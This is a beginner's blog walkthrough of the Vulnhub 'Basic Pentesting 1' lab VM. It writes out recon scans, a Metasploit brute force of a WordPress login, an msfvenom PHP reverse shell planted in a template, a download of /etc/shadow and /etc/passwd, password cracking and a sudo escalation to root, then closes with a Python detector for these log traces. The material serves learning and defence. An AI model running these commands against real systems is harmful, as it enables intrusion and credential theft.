Posted in Blog, CTF, Resources, Walkthrough

Basic Pentesting 1 (Vulnhub) Walkthrough

This VM was set up for newcomers, with multiple options for getting in. The goal is to obtain root. I started working on this one alongside the BSides Vancouver VM as an intro to pen testing. I found a walkthrough by Raj Chandel (http://www.hackingarticles.in/hack-the-basic-penetration-vm-boot2root-challenge/) that I used as a reference when I got stuck. Hopefully this will be detailed enough for a total beginner to work through this challenge and get started with penetration testing or capture the flag (CTF). Since I like to learn by doing, I’ve been looking at walkthroughs for some beginner-level challenges to get an idea of what to do and what to look for.

Reconnaissance

Scanning and Penetration Testing

  • Fire things up, and run ifconfig to get my IP – 192.168.14.4
  • Scan the network using netdiscover -r 192.168.14.0/24

[Screenshot: BPT1]

  • Found 3 machines, now to figure out which is our target using nmap -A 192.168.14.0/24 (this option will give us ports and OS info). I copy/paste the full results into OneNote for reference, but I’ll keep this short in the interest of space.
    • 192.168.14.1: looks like a Windows machine of some sort, not my target, but has a few open ports
    • 192.168.14.2: all ports filtered
    • 192.168.14.3: Linux 3.2-4.8; here’s my target system
      • 21/tcp open ftp ProFTPD 1.3.3c
      • 22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.2
      • 80/tcp open http Apache httpd 2.4.18 (Ubuntu)
  • Check out 192.168.14.3 in a web browser…

[Screenshot: BPT2]

  • Now let’s probe the server using nikto -h 192.168.14.3

[Screenshot: BPT3]

  • This includes a /secret/ directory that “might be interesting”
  • Let’s check that out in the browser – it’s a WordPress blog

[Screenshot: BPT4]


  • Now we’ll try to log in. We get a “server not found” message, and Raj’s reference walkthrough tells us we need to open the admin page using the domain name.
    • Go to /etc/ and find the hosts file.
    • Add [IP of target] vtcsec, save the file
    • Since we’re not connected to the internet, Kali doesn’t know how to reconcile the IP and server name (it can’t look up the DNS info), so we’re adding it.
    • Reference about the Linux host file: https://www.makeuseof.com/tag/modify-manage-hosts-file-linux/
  • Go refresh the browser page to see if it works.
  • It does, so now we’ve got a WP login screen.
  • Now we’ve got options: we can try a few easy default-type usernames and passwords, or try to find out more. Using WPScan could give us the usernames and info on vulnerabilities.
  • I’m going to check out the server in more detail to see what’s there. Since I’m trying to learn, I’m ok doing extra things. I use dirb http://192.168.14.3/secret to check out the directories on the server.
    • I didn’t see anything real exciting, but I filed the results for later.
  • I’d like to know what vulnerabilities I’m looking at, so let’s do a WPScan first: # wpscan -u http://192.168.14.3/secret --enumerate u
    • 9 vulnerabilities from the version number
      • Authenticated JavaScript File upload
      • RSS and Atom Feed Escaping
      • HTML Language Attributes Escaping
      • ‘newbloguser’ Key Weak Hashing
      • MediaElement Cross-Site Scripting (XSS)
      • Application Denial of Service (DoS) (unpatched)
      • Remove localhost Default
      • Use Safe Redirect for Login
      • Escape Version in Generator Tag
    • Theme: twentyseventeen – v1.4
    • No plugins
    • User: admin
    • File the rest of the results for future reading…
  • I could brute force the password with WPScan, but I’ll follow our walkthrough’s guidance and use Metasploit.
  • Fire up Metasploit to brute force the password for ‘admin’
    •  msf> use auxiliary/scanner/http/wordpress_login_enum
    •  msf auxiliary(wordpress_login_enum) > set username admin
    •  msf auxiliary(wordpress_login_enum) > set pass_file /usr/share/wordlists/dirb/common.txt (could use whatever wordlist you want, make sure your file path is correct)
    •  msf auxiliary(wordpress_login_enum) > set targeturi /secret/
    •  msf auxiliary(wordpress_login_enum) > set rhosts 192.168.14.3
    •  msf auxiliary(wordpress_login_enum) > run (or exploit)
  • This worked and we get admin: admin
  • Go login and navigate to the template editor (Appearance – Editor) and then the 404 editor
  • We’ll try to replace the template following Raj’s directions.
    •  msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.14.4 lport=4444 -f raw (the host will be your IP)
    • Copy/paste the code from <?php to die(); and paste it into the 404 template.
    • Update the file
  • Setup a listener using Metasploit
    •  msf > use multi/handler
    •  msf exploit(handler) > set payload php/meterpreter/reverse_tcp
    •  msf exploit(handler) > set lhost 192.168.14.4
    •  msf exploit(handler) > set lport 4444
    •  msf exploit(handler) > run
  • Go to the template in the browser, and you should get a reverse shell. This hasn’t worked well for me, so now what?
  •  I tried creating a new page, calling it meta, and pasting in the php code. Opening that page didn’t get my listener, but it ended in /, let’s try changing that to .php
  • Success! The webpage hangs on connecting, and we get a reverse shell. You can close the web browser if you would like.
  • Let’s use sysinfo to see what we’re dealing with – nothing unexpected, it’s a Linux system.
  • Since Linux stores password info in /etc/, let’s see if we can access that by trying to download the shadow and passwd files.
    •  meterpreter > download /etc/shadow
    •  meterpreter > download /etc/passwd
  • Both downloaded, so we’ll follow Raj’s guidance to use John the Ripper to merge and crack the passwords. We have to go back to the regular terminal to do this.
    •  root@kali:~# unshadow passwd shadow > cracked (combines the two, but doesn’t show us anything)
    •  root@kali:~# john cracked
    • We get marlinspike (marlinspike) to indicate a user and password
  • Great, let’s login as marlinspike…back to meterpreter
  • Trying su - marlinspike gave an “unknown command: su” response. Ok, after some Googling, we need a shell.
    •  meterpreter > shell (since this is a Linux box, the shell will just give you a prompt)
    • Trying su - marlinspike again gets “su: must be run from a terminal”
    • More Googling tells me I need to get a TTY: http://pentestmonkey.net/blog/post-exploitation-without-a-tty
    •  python -c 'import pty; pty.spawn("/bin/sh")'
    • I now have a $, so that’s promising
    • Now I’m able to log in as marlinspike using the su - marlinspike command
  • Back to Raj’s suggestions…I am able to check the sudo -l list and then use sudo bash to get root.

[Screenshot: BPT5]

  • Yay! Challenge complete. Now I want to try a different option. I’m not sure why the 404 change didn’t work – I tried it a bunch of times, and sometimes it would work if I cleared the browser cache and what not, but it wasn’t as reliable as I would like.
  • So I’ll try the Metasploit unix/webapp/wp_admin_shell_upload exploit I found working on the BSides Vancouver VM.
    •  msf > use exploit/unix/webapp/wp_admin_shell_upload
    •  msf exploit(unix/webapp/wp_admin_shell_upload)> set password admin
    •  msf exploit(unix/webapp/wp_admin_shell_upload)> set username admin
    •  msf exploit(unix/webapp/wp_admin_shell_upload)> set targeturi /secret/
    •  msf exploit(unix/webapp/wp_admin_shell_upload)> set rhost 192.168.14.3
    •  msf exploit(unix/webapp/wp_admin_shell_upload)> exploit
  • This got me my meterpreter shell, so let’s see if the same things work. I could download the passwd and shadow files, so I’ll try cracking them using John the Ripper again. This basically gave me the message that it had already done this, and there was no more cracking to be done. That makes sense, since I didn’t clear things out before trying this alternative exploit. So I told john to show me the password, john --show cracked, and got my password again. Then I was able to follow the same procedures. (John the Ripper FAQ: http://www.openwall.com/john/doc/FAQ.shtml)
  • Because I’m a curious person, I went back and deleted vtcsec from the hosts file to see if I could still use the Metasploit exploit. I was still able to open the reverse shell using the wp_admin_shell_upload, so that’s something to file away.
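Both routes into this box leave the same two traces in the Apache access log: a burst of POSTs to wp-login.php from one address (the wordpress_login_enum brute force above), followed by a POST to a wp-admin endpoint that writes code into the site (the 404 template edit through the theme editor, or the plugin upload that wp_admin_shell_upload relies on). The detector below is an added example written for this walkthrough, not code from the post or from Metasploit; the log lines are constructed, and it assumes the combined log format and that the second exploit path goes through /wp-admin/update.php.

```python
import re
from collections import defaultdict
from datetime import datetime
# Constructed Apache combined-log lines (not captured from the VM).
SAMPLE_LOG = """\
192.168.14.4 - - [10/Mar/2018:14:02:02 -0800] "POST /secret/wp-login.php HTTP/1.1" 200 3123 "-" "Mozilla/5.0"
192.168.14.4 - - [10/Mar/2018:14:02:02 -0800] "POST /secret/wp-login.php HTTP/1.1" 200 3123 "-" "Mozilla/5.0"
192.168.14.4 - - [10/Mar/2018:14:02:03 -0800] "POST /secret/wp-login.php HTTP/1.1" 200 3123 "-" "Mozilla/5.0"
192.168.14.4 - - [10/Mar/2018:14:02:03 -0800] "POST /secret/wp-login.php HTTP/1.1" 200 3123 "-" "Mozilla/5.0"
192.168.14.4 - - [10/Mar/2018:14:02:04 -0800] "POST /secret/wp-login.php HTTP/1.1" 302 0 "-" "Mozilla/5.0"
192.168.14.1 - - [10/Mar/2018:14:05:40 -0800] "GET /secret/ HTTP/1.1" 200 11234 "-" "Mozilla/5.0"
192.168.14.4 - - [10/Mar/2018:14:09:12 -0800] "POST /secret/wp-admin/theme-editor.php HTTP/1.1" 302 0 "-" "Mozilla/5.0"
192.168.14.4 - - [10/Mar/2018:14:20:31 -0800] "POST /secret/wp-admin/update.php?action=upload-plugin HTTP/1.1" 200 4410 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+)[^"]*"')
# wp-admin endpoints that write code into the site (theme/404 editor, plugin upload); assumed routes
ADMIN_WRITE = ("/wp-admin/theme-editor.php", "/wp-admin/update.php")

def parse_line(line):
    m = LOG_RE.match(line)           # returns None for lines that do not parse
    if not m:
        return None
    ev = m.groupdict()
    ev["ts"] = datetime.strptime(ev["ts"], "%d/%b/%Y:%H:%M:%S %z")
    ev["path"] = ev["path"].split("?", 1)[0]   # drop the query string
    return ev

def detect(lines, threshold=5, window_seconds=60):
    """Return (finding, ip, timestamp) tuples for login bursts and admin code writes."""
    attempts = defaultdict(list)
    findings = []
    for line in lines:
        ev = parse_line(line)
        if not ev or ev["method"] != "POST":
            continue
        if ev["path"].endswith("/wp-login.php"):
            attempts[ev["ip"]].append(ev["ts"])
        elif ev["path"].endswith(ADMIN_WRITE):
            findings.append(("wp_admin_code_write", ev["ip"], ev["ts"]))
    for ip, times in attempts.items():
        times.sort()
        start = 0
        for end, t in enumerate(times):   # sliding window over sorted timestamps
            while (t - times[start]).total_seconds() > window_seconds:
                start += 1
            if end - start + 1 >= threshold:
                findings.append(("wp_login_burst", ip, t))
                break
    return findings
```

On the sample, the burst from 192.168.14.4 trips the threshold at 14:02:04 and both wp-admin POSTs are flagged; on a real log, an admin code write that follows a login burst from the same address is the pairing worth alerting on.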


All in all, a fun challenge. It took me some time to get things figured out, but it gave me a great introduction to basic penetration testing and making sure my home virtual lab was working nicely. I was able to try out several different tools and had to troubleshoot enough that I wasn’t just following the walkthrough. However, a giant hat tip/thank you to Raj Chandel for his walkthrough.

Author:

Lifelong paradox - cyber sec enthusiast - loves to learn
